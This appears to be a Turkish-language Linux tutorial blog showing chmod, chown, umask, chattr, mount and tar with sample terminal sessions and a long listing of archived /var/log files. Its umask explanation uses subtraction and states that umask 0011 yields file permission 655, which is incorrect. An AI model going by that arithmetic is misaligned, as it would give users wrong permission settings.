chmod -R 755 dizin1/ ile -R parametresi ile kullandığımızda dizin1 ve dizin1 in altındaki dosyaların izinlerini recursive olarak 755 izin bilgisi ile değiştiririz.

chown : Dosya ve dizinlerin sahibini ve grubunu belirleriz.

hakan eren # ll 
total 40
drwxr-xr-x 5 root root 4096 May 19 00:59 ./
drwx------ 26 root root 4096 May 18 04:42 ../
drwxr-xr-x 2 root root 4096 May 19 00:59 dizin1/
-rwxr-xr-- 1 root root  0 May 19 00:59 dosya1*

chown hakan dosya1

Dosya1 in sahibini hakan olarak değiştireceğiz.

hakan eren # chown hakan dosya1
hakan eren # ll
total 40
drwxr-xr-x 2 root root 4096 May 19 00:59 dizin1/
-rwxr-xr-- 1 hakan root  0 May 19 00:59 dosya1*


chown hakan:hakan dosya1 şeklinde kullandığımızda dosya1 in hem sahibini hem grubunu değiştirmiş oluruz.

hakan eren # chown hakan:hakan dosya1
hakan eren # ll
total 40
drwxr-xr-x 2 root root 4096 May 19 00:59 dizin1/
-rwxr-xr-- 1 hakan hakan  0 May 19 00:59 dosya1*

sadece grubunu değiştirmek için

chown :root dosya1 şeklinde de yapabiliriz.

hakan eren # chown :root dosya1
hakan eren # ll
total 40
drwxr-xr-x 2 root root 4096 May 19 00:59 dizin1/
-rwxr-xr-- 1 hakan root  0 May 19 00:59 dosya1*

chown -R hakan:hakan dizin1/ şeklinde -R parametresi ile kullanıldığında dizini ve dizinin altındakilerin recursive olarak sahibini ve grubunu değiştiririz.

dizin1 in sahibini ve grubunu kendisi ve altındaki tüm dizinler dahil hakan olarak değiştiririz.

Aşağıda chmod ile ilgili dosyaların rakamsal olarak değerlerine daha detaylı bakabilirsiniz. Kaynak : http://linuxcommand.org/lts0070.php

777 (rwxrwxrwx) No restrictions on permissions. Anybody may do anything. Generally not a desirable setting.
755 (rwxr-xr-x) The file's owner may read, write, and execute the file. All others may read and execute the file. This setting is common for programs that are used by all users.
700 (rwx------) The file's owner may read, write, and execute the file. Nobody else has any rights. This setting is useful for programs that only the owner may use and must be kept private from others.
666 (rw-rw-rw-) All users may read and write the file.
644 (rw-r--r--) The owner may read and write a file, while all others may only read the file. A common setting for data files that everybody may read, but only the owner may change.
600 (rw-------) The owner may read and write a file. All others have no rights. A common setting for data files that the owner wants to keep private.

20 Mayıs 2016 Cuma

Linux umask, chattr, mount, tar komutları


umask : Dosya ve dizinlerin varsayılan izinlerini görmeye ve değiştirmeye yarar.

hakan eren # umask
0022


Ekran çıkan bu değer verilmeyen izinleri temsil eder.

777-022 = 755 varsayılan dizin iznimizdir.
666-022 = 644 varsayılandaki dosya iznimizdir

usmask ile bu değerleri değiştirebiliriz

hakan eren # umask 0011
hakan eren # umask
0011


777-011 = 766 varsayılan dizin izni
666-011 = 655 varsayılan dosya izni

Dosya sistemlerinde  izinlerin yanı sıra veri günlükleme, sıkıştırma ve değişmezlik gibi ek özniteliklerde bulunmaktadır. Bu gibi öz nitelikleri chattr komutu ile değiştirebiliriz.

chattr +i ornekdosya

hakan eren # touch ornekdosya
hakan eren # chattr +i ornekdosya 
hakan eren # rm -rf ornekdosya 
rm: cannot remove ‘ornekdosya’: Operation not permitted


+i parametresi ile kullandığımızda dosyayı root kullanıcısı olmamıza rağmen silemiyoruz. not permitted diye izinli olmadığımızı söyleyen bir uyarı verir. Dosyayı kimsenin silmesini istemezsek chattr komutunu +i parametresi ile kullanırız.

Bu işlemi geri almak istediğimizde chattr komutunu -i parametresini kullanarak yazarız. ve silebiliriz.

hakan eren # chattr -i ornekdosya
hakan eren # rm -rf ornekdosya

chattr -i dosya
chattr -a dosya
chattr -A dosya

a : Tanımlandığında,dosya üzerine sadece yeni veri eklenebilir fakat varolan veriler değiştirilemez.
veyasilinemez
i : Tanımlandığında,dosya içeriğiherhangi bir şekildedeğiştirilemez(silinemez, isimdeğişikliğiyapılamaz)
A: Tanımlandığında dosyaya yapılanerişimlere ait zamanbilgisi (atime)güncellenmez.

mount : Sistemdeki aygıtların bağlanma yerlerini bu komutu ile görebiliriz.


hakan@hakan ~ $ mount
/dev/sda2 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/cgroup type tmpfs (rw)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
none on /sys/firmware/efi/efivars type efivarfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
none on /sys/fs/pstore type pstore (rw)
/dev/sda1 on /boot/efi type vfat (rw)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,noexec,nosuid,nodev)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse (rw,nosuid,nodev,user=hakan)


/dev/sda2 kök dizinine bağlıdır.

mount komutuyla sistem aygıtlarını istediğimiz dizinede bağlayabiliriz.

mount -o loop,rw centos.iso /mnt herhangi bir iso dosyasını istediğimiz dizine bu komut ile bağlayabiliriz

mount -t ext4 /dev/sda3 /mnt/ İstediğimiz bir disk bölümünü istediğimiz dizine bağlarız. -t parametresi ile ext4 formatı ile dizine bağlayacağımızı belirtmiş oluruz.

tar : Dosya ve dizinleri arşivlemek için kullanılır.

tar -cvzf log.tar.gz /var/log/

hakan paste # tar -cvzf log.tar.gz /var/log/
tar: Removing leading `/' from member names
/var/log/
/var/log/Xorg.20.log
/var/log/syslog.4.gz
/var/log/pm-powersave.log
/var/log/dpkg.log
/var/log/syslog.2.gz
/var/log/dmesg.1.gz
/var/log/ConsoleKit/
/var/log/ConsoleKit/history.2.gz
/var/log/ConsoleKit/history.1
/var/log/ConsoleKit/history
/var/log/dmesg.4.gz
/var/log/udev
/var/log/pm-powersave.log.2.gz
/var/log/syslog.5.gz
/var/log/hp/
/var/log/hp/tmp/
/var/log/fontconfig.log
/var/log/boot.log
/var/log/syslog.3.gz
/var/log/btmp.1
/var/log/cups/
/var/log/cups/access_log.6.gz
/var/log/cups/access_log.5.gz
/var/log/cups/error_log
/var/log/cups/access_log.3.gz
/var/log/cups/page_log
/var/log/cups/access_log
/var/log/cups/access_log.2.gz
/var/log/cups/access_log.7.gz
/var/log/cups/access_log.4.gz
/var/log/cups/access_log.1.gz
/var/log/auth.log.4.gz
/var/log/mysql/
/var/log/mysql/error.log
/var/log/mysql/error.log.4.gz
/var/log/mysql/error.log.6.gz
/var/log/mysql/error.log.3.gz
/var/log/mysql/error.log.7.gz
/var/log/mysql/error.log.5.gz
/var/log/mysql/error.log.1.gz
/var/log/mysql/error.log.2.gz
/var/log/mysql.log.3.gz
/var/log/fsck/
/var/log/fsck/checkroot
/var/log/fsck/checkfs
/var/log/mysql.log.6.gz
/var/log/btmp
/var/log/aptitude
/var/log/dmesg.2.gz
/var/log/mysql.log.5.gz
/var/log/upstart/
/var/log/upstart/cups.log.6.gz
/var/log/upstart/dbus.log.4.gz
/var/log/upstart/alsa-restore.log.6.gz
/var/log/upstart/plymouth-shutdown.log.3.gz
/var/log/upstart/procps-static-network-up.log.2.gz
/var/log/upstart/plymouth-shutdown.log.7.gz
/var/log/upstart/console-setup.log.5.gz
/var/log/upstart/gpu-manager.log.6.gz
/var/log/upstart/gpu-manager.log.4.gz
/var/log/upstart/mountall.log.1.gz
/var/log/upstart/network-manager.log.3.gz
/var/log/upstart/cups.log.7.gz
/var/log/upstart/cups.log.3.gz
/var/log/upstart/alsa-state.log.1.gz
/var/log/upstart/network-manager.log.5.gz
/var/log/upstart/modemmanager.log.5.gz
/var/log/upstart/dbus.log.6.gz
/var/log/upstart/mysql.log.3.gz
/var/log/upstart/mysql.log.6.gz
/var/log/upstart/network-manager.log.2.gz
/var/log/upstart/alsa-state.log.7.gz
/var/log/upstart/container-detect.log.2.gz
/var/log/upstart/kmod.log.4.gz
/var/log/upstart/alsa-state.log.5.gz
/var/log/upstart/ureadahead-other.log.7.gz
/var/log/upstart/mysql.log.5.gz
/var/log/upstart/dbus.log.1.gz
/var/log/upstart/kmod.log.1.gz
/var/log/upstart/console-setup.log.1.gz
/var/log/upstart/procps-virtual-filesystems.log.2.gz
/var/log/upstart/procps-static-network-up.log.6.gz
/var/log/upstart/gpu-manager.log.5.gz
/var/log/upstart/plymouth-shutdown.log.4.gz
/var/log/upstart/modemmanager.log.3.gz
/var/log/upstart/mountall.log.6.gz
/var/log/upstart/procps-virtual-filesystems.log.3.gz
/var/log/upstart/cups.log.5.gz
/var/log/upstart/network-manager.log.7.gz
/var/log/upstart/systemd-logind.log.2.gz
/var/log/upstart/kmod.log.2.gz
/var/log/upstart/kmod.log.3.gz
/var/log/upstart/alsa-state.log.6.gz
/var/log/upstart/alsa-restore.log.4.gz
/var/log/upstart/procps-virtual-filesystems.log.4.gz
/var/log/upstart/ureadahead-other.log.5.gz
/var/log/upstart/systemd-logind.log.7.gz
/var/log/upstart/procps-static-network-up.log.7.gz
/var/log/upstart/kmod.log.5.gz
/var/log/upstart/plymouth-shutdown.log.2.gz
/var/log/upstart/alsa-restore.log.1.gz
/var/log/upstart/alsa-state.log.4.gz
/var/log/upstart/plymouth-shutdown.log.5.gz
/var/log/upstart/console-setup.log.3.gz
/var/log/upstart/plymouth-shutdown.log.1.gz
/var/log/upstart/container-detect.log.1.gz
/var/log/upstart/procps-virtual-filesystems.log.7.gz
/var/log/upstart/dbus.log.3.gz
/var/log/upstart/kmod.log.6.gz
/var/log/upstart/ureadahead.log.2.gz
/var/log/upstart/container-detect.log.7.gz
/var/log/upstart/alsa-restore.log.3.gz
/var/log/upstart/mysql.log.7.gz
/var/log/upstart/wait-for-state-plymouth-shutdownmdm.log.1.gz
/var/log/upstart/alsa-state.log.2.gz
/var/log/upstart/modemmanager.log.7.gz
/var/log/upstart/container-detect.log.5.gz
/var/log/upstart/procps-static-network-up.log.4.gz
/var/log/upstart/ureadahead.log.5.gz
/var/log/upstart/procps-static-network-up.log.3.gz
/var/log/upstart/gpu-manager.log.2.gz
/var/log/upstart/mysql.log.1.gz
/var/log/upstart/console-setup.log.4.gz
/var/log/upstart/gpu-manager.log.1.gz
/var/log/upstart/console-setup.log.6.gz
/var/log/upstart/ureadahead.log.1.gz
/var/log/upstart/kmod.log.7.gz
/var/log/upstart/container-detect.log.6.gz
/var/log/upstart/mountall.log.7.gz
/var/log/upstart/dbus.log.7.gz
/var/log/upstart/ureadahead-other.log.3.gz
/var/log/upstart/mysql.log.2.gz
/var/log/upstart/modemmanager.log.6.gz
/var/log/upstart/procps-virtual-filesystems.log.5.gz
/var/log/upstart/mountall.log.3.gz
/var/log/upstart/mountall.log.2.gz
/var/log/upstart/ureadahead-other.log.4.gz
/var/log/upstart/systemd-logind.log.6.gz
/var/log/upstart/mountall.log.4.gz
/var/log/upstart/systemd-logind.log.5.gz
/var/log/upstart/mountall.log.5.gz
/var/log/upstart/console-setup.log.2.gz
/var/log/upstart/ureadahead-other.log.1.gz
/var/log/upstart/systemd-logind.log.1.gz
/var/log/upstart/procps-static-network-up.log.1.gz
/var/log/upstart/ureadahead.log.6.gz
/var/log/upstart/dbus.log.2.gz
/var/log/upstart/network-manager.log.4.gz
/var/log/upstart/ureadahead-other.log.6.gz
/var/log/upstart/ureadahead.log.3.gz
/var/log/upstart/modemmanager.log.4.gz
/var/log/upstart/alsa-state.log.3.gz
/var/log/upstart/systemd-logind.log.4.gz
/var/log/upstart/network-manager.log.1.gz
/var/log/upstart/mysql.log.4.gz
/var/log/upstart/container-detect.log.4.gz
/var/log/upstart/ureadahead.log.4.gz
/var/log/upstart/gpu-manager.log.7.gz
/var/log/upstart/ureadahead-other.log.2.gz
/var/log/upstart/ureadahead.log.7.gz
/var/log/upstart/gpu-manager.log.3.gz
/var/log/upstart/network-manager.log.6.gz
/var/log/upstart/procps-static-network-up.log.5.gz
/var/log/upstart/alsa-restore.log.5.gz
/var/log/upstart/plymouth-shutdown.log.6.gz
/var/log/upstart/cups.log.4.gz
/var/log/upstart/cups.log.1.gz
/var/log/upstart/alsa-restore.log.2.gz
/var/log/upstart/modemmanager.log.2.gz
/var/log/upstart/systemd-logind.log.3.gz
/var/log/upstart/procps-virtual-filesystems.log.6.gz
/var/log/upstart/cups.log.2.gz
/var/log/upstart/container-detect.log.3.gz
/var/log/upstart/dbus.log.5.gz
/var/log/upstart/modemmanager.log.1.gz
/var/log/upstart/procps-virtual-filesystems.log.1.gz
/var/log/upstart/console-setup.log.7.gz
/var/log/kern.log.3.gz
/var/log/lastlog
/var/log/dpkg.log.1
/var/log/faillog
/var/log/dmesg.0
/var/log/samba/
/var/log/samba/log.172.20.10.3
/var/log/samba/log.tamay-pc
/var/log/samba/log.10.99.10.216
/var/log/samba/log.10.99.13.165
/var/log/samba/log.10.99.12.45
/var/log/samba/log.10.99.8.248
/var/log/samba/log.10.99.1.32
/var/log/samba/log.10.99.9.127
/var/log/samba/log.kocatepekahve
/var/log/samba/log.user-bilgisayar
/var/log/samba/log.10.99.1.248
/var/log/samba/log.smbd
/var/log/samba/log.smbd.7.gz
/var/log/samba/log.nmbd.4.gz
/var/log/samba/log.10.99.4.165
/var/log/samba/log.nmbd.7.gz
/var/log/samba/log.192.168.1.37
/var/log/samba/log.user34
/var/log/samba/log.sengul
/var/log/samba/log.ert-bilgisayar
/var/log/samba/log.192.168.1.50
/var/log/samba/log.ahmety__cesan
/var/log/samba/log.lenovo-pc
/var/log/samba/log.smbd.1.gz
/var/log/samba/log.%m
/var/log/samba/log.nmbd.2.gz
/var/log/samba/log.192.168.43.101
/var/log/samba/log.nmbd
/var/log/samba/log.x
/var/log/samba/log.smbd.3.gz
/var/log/samba/log.smbd.2.gz
/var/log/samba/log.192.168.0.100
/var/log/samba/log.ender-pc
/var/log/samba/log.smbd.4.gz
/var/log/samba/log.desktop-5n291m6
/var/log/samba/log.smbd.5.gz
/var/log/samba/log.10.99.11.73
/var/log/samba/log.ert
/var/log/samba/log.10.99.9.249
/var/log/samba/log.metehn
/var/log/samba/log.smbd.6.gz
/var/log/samba/log.clientxp
/var/log/samba/cores/
/var/log/samba/cores/nmbd/
/var/log/samba/cores/smbd/
/var/log/samba/log.sahiner-vaio
/var/log/samba/log.192.168.1.64
/var/log/samba/log.10.99.0.150
/var/log/samba/log.10.99.9.77
/var/log/samba/log.192.168.1.48
/var/log/samba/log.192.168.1.35
/var/log/samba/log.nmbd.6.gz
/var/log/samba/log.10.99.7.218
/var/log/samba/log.192.168.1.33
/var/log/samba/log.user32
/var/log/samba/log.nmbd.5.gz
/var/log/samba/log.192.168.1.51
/var/log/samba/log.nmbd.1.gz
/var/log/samba/log.pc121
/var/log/samba/log.192.168.1.34
/var/log/samba/log.192.168.2.6
/var/log/samba/log.unipc
/var/log/samba/log.samsung
/var/log/samba/log.kali
/var/log/samba/log.nmbd.3.gz
/var/log/samba/log.192.168.1.59
/var/log/samba/log.ruya
/var/log/samba/log.mustafa
/var/log/samba/log.user5
/var/log/samba/log.10.99.6.30
/var/log/mintsystem.log
/var/log/kern.log.2.gz
/var/log/Xorg.0.log.old
/var/log/apache2/
/var/log/apache2/error.log.10.gz
/var/log/apache2/access.log.9.gz
/var/log/apache2/access.log.3.gz
/var/log/apache2/error.log
/var/log/apache2/access.log.8.gz
/var/log/apache2/error.log.4.gz
/var/log/apache2/access.log.2.gz
/var/log/apache2/error.log.9.gz
/var/log/apache2/access.log.7.gz
/var/log/apache2/access.log.6.gz
/var/log/apache2/error.log.6.gz
/var/log/apache2/other_vhosts_access.log
/var/log/apache2/access.log.5.gz
/var/log/apache2/error.log.11.gz
/var/log/apache2/access.log.10.gz
/var/log/apache2/error.log.8.gz
/var/log/apache2/error.log.3.gz
/var/log/apache2/error.log.7.gz
/var/log/apache2/access.log
/var/log/apache2/access.log.4.gz
/var/log/apache2/access.log.1
/var/log/apache2/error.log.5.gz
/var/log/apache2/error.log.1
/var/log/apache2/error.log.2.gz
/var/log/apache2/access.log.11.gz
/var/log/auth.log
/var/log/kern.log.4.gz
/var/log/pm-powersave.log.1
/var/log/alternatives.log.2.gz
/var/log/pm-suspend.log.2.gz
/var/log/syslog.1
/var/log/mysql.log
/var/log/mysql.log.7.gz
/var/log/mdm/
/var/log/mdm/:0.log
/var/log/mdm/:0.log.1
/var/log/mdm/:0.log.3
/var/log/mdm/:0.log.2
/var/log/mdm/:0.log.4
/var/log/mdm/:20.log
/var/log/syslog.7.gz
/var/log/pycentral.log
/var/log/apt/
/var/log/apt/history.log.1.gz
/var/log/apt/history.log
/var/log/apt/term.log.2.gz
/var/log/apt/term.log
/var/log/apt/term.log.1.gz
/var/log/apt/history.log.2.gz
/var/log/auth.log.3.gz
/var/log/kern.log.1
/var/log/wtmp
/var/log/dpkg.log.2.gz
/var/log/mysql.log.1.gz
/var/log/unattended-upgrades/
/var/log/unattended-upgrades/unattended-upgrades-shutdown.log
/var/log/mysql.log.2.gz
/var/log/alternatives.log
/var/log/syslog.6.gz
/var/log/kern.log
/var/log/Xorg.0.log
/var/log/pm-suspend.log.1
/var/log/alternatives.log.1
/var/log/syslog
/var/log/aptitude.1.gz
/var/log/speech-dispatcher/
/var/log/gpu-manager.log
/var/log/installer/
/var/log/installer/initial-status.gz
/var/log/installer/version
/var/log/installer/debug
/var/log/installer/partman
/var/log/installer/casper.log
/var/log/installer/syslog
/var/log/installer/media-info
/var/log/mysql.log.4.gz
/var/log/pm-suspend.log
/var/log/mysql.err
/var/log/auth.log.2.gz
/var/log/dbconfig-common/
/var/log/dbconfig-common/dbc.log
/var/log/auth.log.1
/var/log/dmesg
/var/log/vbox-install.log
/var/log/wtmp.1
/var/log/bootstrap.log
/var/log/dmesg.3.gz
hakan paste # ll
-rw-rw-rw- 1 root root 2478668 May 19 21:04 log.tar.gz


log dosyalarını tar ile tek bir dosya olacak şekilde sıkıştırarak arşivleriz /var/log dizini altındaki tüm dosyaları log.tar.gz şeklinde tek bir dosyada sıkıştırdı.

Sıkıştırılmış dosyayıda açmak için tar -xvzf log.tar.gz şeklinde yazarak çıkarabiliriz. /var ı çıkardı ve altındaki tüm dizinleri bunlarıda ls ile gördük

hakan paste # tar -xvzf log.tar.gz 
var/log/
var/log/Xorg.20.log
var/log/syslog.4.gz
var/log/pm-powersave.log
var/log/dpkg.log
var/log/syslog.2.gz
var/log/dmesg.1.gz
var/log/ConsoleKit/
var/log/ConsoleKit/history.2.gz
var/log/ConsoleKit/history.1
var/log/ConsoleKit/history
var/log/dmesg.4.gz
var/log/udev
var/log/pm-powersave.log.2.gz
var/log/syslog.5.gz
var/log/hp/
var/log/hp/tmp/
var/log/fontconfig.log
var/log/boot.log
var/log/syslog.3.gz
var/log/btmp.1
var/log/cups/
var/log/cups/access_log.6.gz
var/log/cups/access_log.5.gz
var/log/cups/error_log
var/log/cups/access_log.3.gz
var/log/cups/page_log
var/log/cups/access_log
var/log/cups/access_log.2.gz
var/log/cups/access_log.7.gz
var/log/cups/access_log.4.gz
var/log/cups/access_log.1.gz
var/log/auth.log.4.gz
var/log/mysql/
var/log/mysql/error.log
var/log/mysql/error.log.4.gz
var/log/mysql/error.log.6.gz
var/log/mysql/error.log.3.gz
var/log/mysql/error.log.7.gz
var/log/mysql/error.log.5.gz
var/log/mysql/error.log.1.gz
var/log/mysql/error.log.2.gz
var/log/mysql.log.3.gz
var/log/fsck/
var/log/fsck/checkroot
var/log/fsck/checkfs
var/log/mysql.log.6.gz
var/log/btmp
var/log/aptitude
var/log/dmesg.2.gz
var/log/mysql.log.5.gz
var/log/upstart/
var/log/upstart/cups.log.6.gz
var/log/upstart/dbus.log.4.gz
var/log/upstart/alsa-restore.log.6.gz
var/log/upstart/plymouth-shutdown.log.3.gz
var/log/upstart/procps-static-network-up.log.2.gz
var/log/upstart/plymouth-shutdown.log.7.gz
var/log/upstart/console-setup.log.5.gz
var/log/upstart/gpu-manager.log.6.gz
var/log/upstart/gpu-manager.log.4.gz
var/log/upstart/mountall.log.1.gz
var/log/upstart/network-manager.log.3.gz
var/log/upstart/cups.log.7.gz
var/log/upstart/cups.log.3.gz
var/log/upstart/alsa-state.log.1.gz
var/log/upstart/network-manager.log.5.gz
var/log/upstart/modemmanager.log.5.gz
var/log/upstart/dbus.log.6.gz
var/log/upstart/mysql.log.3.gz
var/log/upstart/mysql.log.6.gz
var/log/upstart/network-manager.log.2.gz
var/log/upstart/alsa-state.log.7.gz
var/log/upstart/container-detect.log.2.gz
var/log/upstart/kmod.log.4.gz
var/log/upstart/alsa-state.log.5.gz
var/log/upstart/ureadahead-other.log.7.gz
var/log/upstart/mysql.log.5.gz
var/log/upstart/dbus.log.1.gz
var/log/upstart/kmod.log.1.gz
var/log/upstart/console-setup.log.1.gz
var/log/upstart/procps-virtual-filesystems.log.2.gz
var/log/upstart/procps-static-network-up.log.6.gz
var/log/upstart/gpu-manager.log.5.gz
var/log/upstart/plymouth-shutdown.log.4.gz
var/log/upstart/modemmanager.log.3.gz
var/log/upstart/mountall.log.6.gz
var/log/upstart/procps-virtual-filesystems.log.3.gz
var/log/upstart/cups.log.5.gz
var/log/upstart/network-manager.log.7.gz
var/log/upstart/systemd-logind.log.2.gz
var/log/upstart/kmod.log.2.gz
var/log/upstart/kmod.log.3.gz
var/log/upstart/alsa-state.log.6.gz
var/log/upstart/alsa-restore.log.4.gz
var/log/upstart/procps-virtual-filesystems.log.4.gz
var/log/upstart/ureadahead-other.log.5.gz
var/log/upstart/systemd-logind.log.7.gz
var/log/upstart/procps-static-network-up.log.7.gz
var/log/upstart/kmod.log.5.gz
var/log/upstart/plymouth-shutdown.log.2.gz
var/log/upstart/alsa-restore.log.1.gz
var/log/upstart/alsa-state.log.4.gz
var/log/upstart/plymouth-shutdown.log.5.gz
var/log/upstart/console-setup.log.3.gz
var/log/upstart/plymouth-shutdown.log.1.gz
var/log/upstart/container-detect.log.1.gz
var/log/upstart/procps-virtual-filesystems.log.7.gz
var/log/upstart/dbus.log.3.gz
var/log/upstart/kmod.log.6.gz
var/log/upstart/ureadahead.log.2.gz
var/log/upstart/container-detect.log.7.gz
var/log/upstart/alsa-restore.log.3.gz
var/log/upstart/mysql.log.7.gz
var/log/upstart/wait-for-state-plymouth-shutdownmdm.log.1.gz
var/log/upstart/alsa-state.log.2.gz
var/log/upstart/modemmanager.log.7.gz
var/log/upstart/container-detect.log.5.gz
var/log/upstart/procps-static-network-up.log.4.gz
var/log/upstart/ureadahead.log.5.gz
var/log/upstart/procps-static-network-up.log.3.gz
var/log/upstart/gpu-manager.log.2.gz
var/log/upstart/mysql.log.1.gz
var/log/upstart/console-setup.log.4.gz
var/log/upstart/gpu-manager.log.1.gz
var/log/upstart/console-setup.log.6.gz
var/log/upstart/ureadahead.log.1.gz
var/log/upstart/kmod.log.7.gz
var/log/upstart/container-detect.log.6.gz
var/log/upstart/mountall.log.7.gz
var/log/upstart/dbus.log.7.gz
var/log/upstart/ureadahead-other.log.3.gz
var/log/upstart/mysql.log.2.gz
var/log/upstart/modemmanager.log.6.gz
var/log/upstart/procps-virtual-filesystems.log.5.gz
var/log/upstart/mountall.log.3.gz
var/log/upstart/mountall.log.2.gz
var/log/upstart/ureadahead-other.log.4.gz
var/log/upstart/systemd-logind.log.6.gz
var/log/upstart/mountall.log.4.gz
var/log/upstart/systemd-logind.log.5.gz
var/log/upstart/mountall.log.5.gz
var/log/upstart/console-setup.log.2.gz
var/log/upstart/ureadahead-other.log.1.gz
var/log/upstart/systemd-logind.log.1.gz
var/log/upstart/procps-static-network-up.log.1.gz
var/log/upstart/ureadahead.log.6.gz
var/log/upstart/dbus.log.2.gz
var/log/upstart/network-manager.log.4.gz
var/log/upstart/ureadahead-other.log.6.gz
var/log/upstart/ureadahead.log.3.gz
var/log/upstart/modemmanager.log.4.gz
var/log/upstart/alsa-state.log.3.gz
var/log/upstart/systemd-logind.log.4.gz
var/log/upstart/network-manager.log.1.gz
var/log/upstart/mysql.log.4.gz
var/log/upstart/container-detect.log.4.gz
var/log/upstart/ureadahead.log.4.gz
var/log/upstart/gpu-manager.log.7.gz
var/log/upstart/ureadahead-other.log.2.gz
var/log/upstart/ureadahead.log.7.gz
var/log/upstart/gpu-manager.log.3.gz
var/log/upstart/network-manager.log.6.gz
var/log/upstart/procps-static-network-up.log.5.gz
var/log/upstart/alsa-restore.log.5.gz
var/log/upstart/plymouth-shutdown.log.6.gz
var/log/upstart/cups.log.4.gz
var/log/upstart/cups.log.1.gz
var/log/upstart/alsa-restore.log.2.gz
var/log/upstart/modemmanager.log.2.gz
var/log/upstart/systemd-logind.log.3.gz
var/log/upstart/procps-virtual-filesystems.log.6.gz
var/log/upstart/cups.log.2.gz
var/log/upstart/container-detect.log.3.gz
var/log/upstart/dbus.log.5.gz
var/log/upstart/modemmanager.log.1.gz
var/log/upstart/procps-virtual-filesystems.log.1.gz
var/log/upstart/console-setup.log.7.gz
var/log/kern.log.3.gz
var/log/lastlog
var/log/dpkg.log.1
var/log/faillog
var/log/dmesg.0
var/log/samba/
var/log/samba/log.172.20.10.3
var/log/samba/log.tamay-pc
var/log/samba/log.10.99.10.216
var/log/samba/log.10.99.13.165
var/log/samba/log.10.99.12.45
var/log/samba/log.10.99.8.248
var/log/samba/log.10.99.1.32
var/log/samba/log.10.99.9.127
var/log/samba/log.kocatepekahve
var/log/samba/log.user-bilgisayar
var/log/samba/log.10.99.1.248
var/log/samba/log.smbd
var/log/samba/log.smbd.7.gz
var/log/samba/log.nmbd.4.gz
var/log/samba/log.10.99.4.165
var/log/samba/log.nmbd.7.gz
var/log/samba/log.192.168.1.37
var/log/samba/log.user34
var/log/samba/log.sengul
var/log/samba/log.ert-bilgisayar
var/log/samba/log.192.168.1.50
var/log/samba/log.ahmety__cesan
var/log/samba/log.lenovo-pc
var/log/samba/log.smbd.1.gz
var/log/samba/log.%m
var/log/samba/log.nmbd.2.gz
var/log/samba/log.192.168.43.101
var/log/samba/log.nmbd
var/log/samba/log.x
var/log/samba/log.smbd.3.gz
var/log/samba/log.smbd.2.gz
var/log/samba/log.192.168.0.100
var/log/samba/log.ender-pc
var/log/samba/log.smbd.4.gz
var/log/samba/log.desktop-5n291m6
var/log/samba/log.smbd.5.gz
var/log/samba/log.10.99.11.73
var/log/samba/log.ert
var/log/samba/log.10.99.9.249
var/log/samba/log.metehn
var/log/samba/log.smbd.6.gz
var/log/samba/log.clientxp
var/log/samba/cores/
var/log/samba/cores/nmbd/
var/log/samba/cores/smbd/
var/log/samba/log.sahiner-vaio
var/log/samba/log.192.168.1.64
var/log/samba/log.10.99.0.150
var/log/samba/log.10.99.9.77
var/log/samba/log.192.168.1.48
var/log/samba/log.192.168.1.35
var/log/samba/log.nmbd.6.gz
var/log/samba/log.10.99.7.218
var/log/samba/log.192.168.1.33
var/log/samba/log.user32
var/log/samba/log.nmbd.5.gz
var/log/samba/log.192.168.1.51
var/log/samba/log.nmbd.1.gz
var/log/samba/log.pc121
var/log/samba/log.192.168.1.34
var/log/samba/log.192.168.2.6
var/log/samba/log.unipc
var/log/samba/log.samsung
var/log/samba/log.kali
var/log/samba/log.nmbd.3.gz
var/log/samba/log.192.168.1.59
var/log/samba/log.ruya
var/log/samba/log.mustafa
var/log/samba/log.user5
var/log/samba/log.10.99.6.30
var/log/mintsystem.log
var/log/kern.log.2.gz
var/log/Xorg.0.log.old
var/log/apache2/
var/log/apache2/error.log.10.gz
var/log/apache2/access.log.9.gz
var/log/apache2/access.log.3.gz
var/log/apache2/error.log
var/log/apache2/access.log.8.gz
var/log/apache2/error.log.4.gz
var/log/apache2/access.log.2.gz
var/log/apache2/error.log.9.gz
var/log/apache2/access.log.7.gz
var/log/apache2/access.log.6.gz
var/log/apache2/error.log.6.gz
var/log/apache2/other_vhosts_access.log
var/log/apache2/access.log.5.gz
var/log/apache2/error.log.11.gz
var/log/apache2/access.log.10.gz
var/log/apache2/error.log.8.gz
var/log/apache2/error.log.3.gz
var/log/apache2/error.log.7.gz
var/log/apache2/access.log
var/log/apache2/access.log.4.gz
var/log/apache2/access.log.1
var/log/apache2/error.log.5.gz
var/log/apache2/error.log.1
var/log/apache2/error.log.2.gz
var/log/apache2/access.log.11.gz
var/log/auth.log
var/log/kern.log.4.gz
var/log/pm-powersave.log.1
var/log/alternatives.log.2.gz
var/log/pm-suspend.log.2.gz
var/log/syslog.1
var/log/mysql.log
var/log/mysql.log.7.gz
var/log/mdm/
var/log/mdm/:0.log
var/log/mdm/:0.log.1
var/log/mdm/:0.log.3
var/log/mdm/:0.log.2
var/log/mdm/:0.log.4
var/log/mdm/:20.log
var/log/syslog.7.gz
var/log/pycentral.log
var/log/apt/
var/log/apt/history.log.1.gz
var/log/apt/history.log
var/log/apt/term.log.2.gz
var/log/apt/term.log
var/log/apt/term.log.1.gz
var/log/apt/history.log.2.gz
var/log/auth.log.3.gz
var/log/kern.log.1
var/log/wtmp
var/log/dpkg.log.2.gz
var/log/mysql.log.1.gz
var/log/unattended-upgrades/
var/log/unattended-upgrades/unattended-upgrades-shutdown.log
var/log/mysql.log.2.gz
var/log/alternatives.log
var/log/syslog.6.gz
var/log/kern.log
var/log/Xorg.0.log
var/log/pm-suspend.log.1
var/log/alternatives.log.1
var/log/syslog
var/log/aptitude.1.gz
var/log/speech-dispatcher/
var/log/gpu-manager.log
var/log/installer/
